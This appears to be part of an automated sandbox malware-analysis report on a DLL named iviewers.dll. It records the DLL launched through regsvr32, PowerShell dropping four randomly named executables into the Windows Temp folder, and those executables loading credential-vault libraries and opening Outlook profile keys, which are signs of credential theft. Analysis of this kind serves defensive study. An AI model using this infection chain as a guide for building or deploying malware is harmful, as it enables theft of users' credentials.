Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: apphelp.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: wininet.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: mswsock.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: wldp.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: sspicli.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: iertutil.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: profapi.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: winhttp.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: winnsi.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: urlmon.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: srvcli.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: netutils.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: schannel.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: msasn1.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: dpapi.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: gpapi.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: vaultcli.dll
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Section loaded: wintypes.dll
Source: C:\Windows\Temp\ochicikt.z2z.exe	Section loaded: apphelp.dll
Source: C:\Windows\Temp\ochicikt.z2z.exe	Section loaded: wininet.dll
Source: C:\Windows\Temp\ochicikt.z2z.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Temp\ochicikt.z2z.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Temp\ochicikt.z2z.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Temp\inyligbs.qlq.exe	Section loaded: apphelp.dll
Source: C:\Windows\Temp\inyligbs.qlq.exe	Section loaded: wininet.dll
Source: C:\Windows\Temp\inyligbs.qlq.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Temp\inyligbs.qlq.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Temp\inyligbs.qlq.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Section loaded: apphelp.dll
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Section loaded: wininet.dll
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Section loaded: ntasn1.dll

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: iviewers.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: iviewers.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Code function: 26_2_00007FF62184D570 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

26_2_00007FF62184D570

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_04356358 push eax; ret	6_2_04356361
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_04352CA5 push 04B80729h; retf	6_2_04352CFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_04355DD0 push esp; ret	6_2_04355DE3
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62185CAB2 push rdi; retf 0004h	26_2_00007FF62185CAB5
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741A8CAB2 push rdi; retf 0004h	27_2_00007FF741A8CAB5
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AA0E4E pushfq ; retf	27_2_00007FF741AA0E5A
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEC0E4E pushfq ; retf	28_2_00007FF7CEEC0E5A
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEACAB2 push rdi; retf 0004h	28_2_00007FF7CEEACAB5
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A80E4E pushfq ; retf	29_2_00007FF786A80E5A
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786A6CAB2 push rdi; retf 0004h	29_2_00007FF786A6CAB5

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\t0ppkxxj.rwu.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\ochicikt.z2z.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\5mg21dmq.1jt.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\inyligbs.qlq.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\t0ppkxxj.rwu.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\ochicikt.z2z.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\5mg21dmq.1jt.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\inyligbs.qlq.exe	Jump to dropped file

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Code function: 26_2_00007FF62188C600 ExitProcess,OpenMutexA,ExitProcess,CreateMutexExA,ExitProcess,ReleaseMutex,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

26_2_00007FF62188C600

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
